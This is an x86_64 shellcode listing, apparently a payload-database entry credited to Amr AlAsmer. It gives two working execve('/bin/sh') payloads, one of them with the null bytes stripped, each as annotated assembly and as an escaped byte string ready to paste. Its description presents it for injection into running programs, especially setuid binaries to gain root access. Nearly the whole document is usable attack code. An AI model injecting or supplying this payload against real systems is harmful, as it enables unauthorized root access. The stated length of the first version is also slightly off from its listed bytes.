
Arch: x86_64 

Description : shell code made by Amr AlAsmer ,that can be injected into executed program 
,strong when injected into setuid binaries to gain root access 

Code job : push "/bin/sh" string into stack and call execve syscall (0x3b)

Length : 29 bytes

Syntax : intel

Code :
48 b9 2f 62 69 6e 2f   | 	movabs rcx,0x68732f6e69622f
73 68 00                
51                     | 	push   rcx
48 c7 c0 3b 00 00 00   | 	mov    rax,0x3b
48 89 e7               | 	mov    rdi,rsp
48 31 d2               | 	xor    rdx,rdx
48 31 f6               | 	xor    rsi,rsi
0f 05                  | 	syscall


Shell Code in String format :
"\x48\xb9\x2f\x62\x69\x6e\x2f\x73\x68\x00\x51\x48\xc7\xc0\x3b\x00\x00\x00\x48\x89\xe7\x48\x31\xd2\x48\x31\xf6\x0f\x05"





same code but with no bad chars "0x00"

Length : 28 bytes
Inspired by: Andrew Bellini
Code: 
48 31 c0              |  xor    rax,rax
50                    |  push   rax
48 b9 2f 2f 62 69 6e 	|  movabs rcx,0x68732f6e69622f2f
2f 73 68 
51                   	|  push   rcx
b0 3b                	|  mov    al,0x3b
48 89 e7             	|  mov    rdi,rsp
48 31 d2             	|  xor    rdx,rdx
48 31 f6             	|  xor    rsi,rsi
0f 05                	|  syscall


Shell Code in String format :
"\x48\x31\xC0\x50\x48\xb9\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x51\xb0\x3b\x48\x89\xe7\x48\x31\xd2\x48\x31\xf6\x0f\x05"
